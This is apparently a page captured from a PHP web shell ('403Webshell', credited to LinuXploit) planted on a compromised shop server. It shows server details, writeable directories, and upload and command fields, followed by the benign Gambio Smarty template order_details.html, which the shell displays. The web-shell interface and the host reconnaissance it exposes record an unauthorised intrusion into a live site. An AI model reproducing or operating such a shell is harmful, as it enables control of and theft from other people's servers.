403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/templates/Honeygrid/module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/templates/Honeygrid/module//order_details.html
{load_language_text section="order_details"}
{load_language_text section="general" name="general"}
{load_language_text section="gambioultra" name="gambioultra"}
{load_language_text section="buttons" name="button"}

{block name="module_order_details"}
	<div class="order-wishlist col-xs-12 col-md-8" data-gambio-widget="customizer" data-customizer-page="cart">
		{block name="module_order_details_table"}
			<table class="table table-responsive">
				{block name="module_order_details_table_thead"}
					<thead>
						{include file="get_usermod:{$tpl_path}snippets/order/order_item.html"
							is_wishlist=false
							is_tablehead=true
						}
					</thead>
				{/block}
				
				{block name="module_order_details_table_tbody"}
					<tbody>
						{block name="module_order_details_item_foreach"}
							{foreach name=cart item=module_data from=$content_data.module_content}
								{block name="module_order_details_item"}
									{block name="module_order_details_item_p_model"}
										{assign var="p_model" value=""}
										
										{block name="module_order_details_item_p_model_assign_if"}
											{if $module_data.PRODUCTS_MODEL && $module_data.PRODUCTS_MODEL != ''}
												{block name="module_order_details_item_p_model_assign"}
													{assign var="p_model" value=$txt.text_model|cat:" "|cat:$module_data.PRODUCTS_MODEL}
												{/block}
											{/if}
										{/block}
									{/block}

									{block name="module_order_details_item_p_weight"}
										{assign var="p_weight" value=""}
									
										{block name="module_order_details_item_p_weight_assign_if"}
											{if $module_data.GM_WEIGHT && $module_data.GM_WEIGHT != '' && $module_data.GM_WEIGHT != '0'}
												{block name="module_order_details_item_p_weight_assign"}
													{assign var="p_weight" value=$txt.text_weight|cat:" "|cat:$module_data.GM_WEIGHT|cat:" "|cat:$txt.text_weight_unit}
												{/block}
											{/if}
										{/block}
									{/block}

									{block name="module_order_details_item_p_shipping_time"}
										{assign var="p_shipping_time" value=""}
	
										{block name="module_order_details_item_p_shipping_time_assign_if"}
											{if $module_data.PRODUCTS_SHIPPING_TIME && $module_data.PRODUCTS_SHIPPING_TIME != ''}
												{block name="module_order_details_item_p_shipping_time_assign"}
													{assign var="p_shipping_time" value=$txt.text_shippingtime|cat:" "|cat:$module_data.PRODUCTS_SHIPPING_TIME}
												{/block}
											{/if}
										{/block}
									{/block}
	
									{block name="module_order_details_item_STR_attributes"}
										{assign var="STR_attributes" value=""}
	
										{block name="module_order_details_item_STR_attributes_assign_if"}
											{if $module_data.ATTRIBUTES && $module_data.ATTRIBUTES != ''}
												{block name="module_order_details_item_STR_attributes_assign_foreach"}
													{foreach key=key_data item=item_data from=$module_data.ATTRIBUTES}
														{block name="module_order_details_item_STR_attributes_assign"}
															{assign var="STR_attributes" value=$STR_attributes|cat:$item_data.NAME|cat:": "|cat:$item_data.VALUE_NAME|cat:"<br />"}
														{/block}
													{/foreach}
												{/block}
											{/if}
										{/block}
									{/block}

									{block name="module_order_details_item_order_item_snippet_include"}
										{include file="get_usermod:{$tpl_path}snippets/order/order_item.html"
										is_wishlist=false
										is_confirmation=false
										
										last=($smarty.foreach.cart.last) ? true : false
										p_url=$module_data.PRODUCTS_LINK
										p_name=$module_data.PRODUCTS_NAME
										image_src={($module_data.PRODUCTS_IMAGE && $module_data.PRODUCTS_IMAGE != "") ? $module_data.PRODUCTS_IMAGE : ""}
										image_alt={($module_data.IMAGE_ALT && $module_data.IMAGE_ALT != "") ? $module_data.IMAGE_ALT : $module_data.PRODUCTS_NAME}
										image_title={($module_data.IMAGE_ALT && $module_data.IMAGE_ALT != "") ? $module_data.IMAGE_ALT : $module_data.PRODUCTS_NAME}
										p_model=$p_model
										show_p_model=$module_data.SHOW_PRODUCTS_MODEL
										p_weight=$p_weight
										p_shipping_time=$p_shipping_time
										p_attributes=$STR_attributes
										p_price_single=$module_data.PRODUCTS_SINGLE_PRICE
										p_price_vpe={($module_data.PRODUCTS_VPE_ARRAY.vpe_text && $module_data.PRODUCTS_VPE_ARRAY.vpe_text != '') ? $module_data.PRODUCTS_VPE_ARRAY.vpe_text : ""}
										p_shipping_info=$module_data.TAX_SHIPPING_INFO
										p_unit={($module_data.UNIT && $module_data.UNIT != '') ? $module_data.UNIT : ""}
									
										p_qty_name=$module_data.PRODUCTS_QTY_INPUT_NAME
										p_qty_value=$module_data.PRODUCTS_QTY_VALUE
										p_price_final=$module_data.PRODUCTS_PRICE
									
										p_hidden_name=$module_data.PRODUCTS_ID_INPUT_NAME
										p_hidden_value=$module_data.PRODUCTS_ID_EXTENDED
										p_hidden_qty_name=$module_data.PRODUCTS_OLDQTY_INPUT_NAME
										p_hidden_qty_value=$module_data.PRODUCTS_QTY_VALUE
										p_error_id=$module_data.PRODUCTS_ID
										tpl_properties=$module_data.PROPERTIES
										}
									{/block}
								{/block}
							{/foreach}
						{/block}
					</tbody>
				{/block}
			</table>
		{/block}

		{block name="module_order_details_continue_shopping_if"}
			{if $content_data.module_content|@count == 0 || ALWAYS_SHOW_CONTINUE_SHOPPING_BUTTON|gm_get_conf === 'true'}
				{block name="module_order_details_continue_shopping"}
					<div class="continue-shopping-button-container col-md-4 col-xs-12">
						<a title="{$button.continue_shopping}" href="{$content_data.BUTTON_BACK_URL}" class="btn btn-default btn-block">
							{$button.continue_shopping}
						</a>
					</div>
				{/block}
			{/if}
		{/block}
	
	</div>

	{block name="module_order_details_order_total"}
		<div class="total-box col-xs-12 col-md-4">
			{include file="get_usermod:{$tpl_path}snippets/order/order_total.html"}
		</div>
	{/block}
	
	{if $content_data.GIFT_SYSTEM_ACTIVE}
		{block name="module_order_details_coupon"}
			<div class="{if $smarty.session.customer_id}coupon-box{/if} col-xs-12 col-md-4 pull-right">
				{include file="get_usermod:{$tpl_path}snippets/order/order_coupon.html"}
			</div>
		{/block}
	{/if}

	<input id="field_cart_delete_products_id" type="hidden" name="cart_delete[]" value="" />
{/block}

Youez - 2016 - github.com/yon3zu
LinuXploit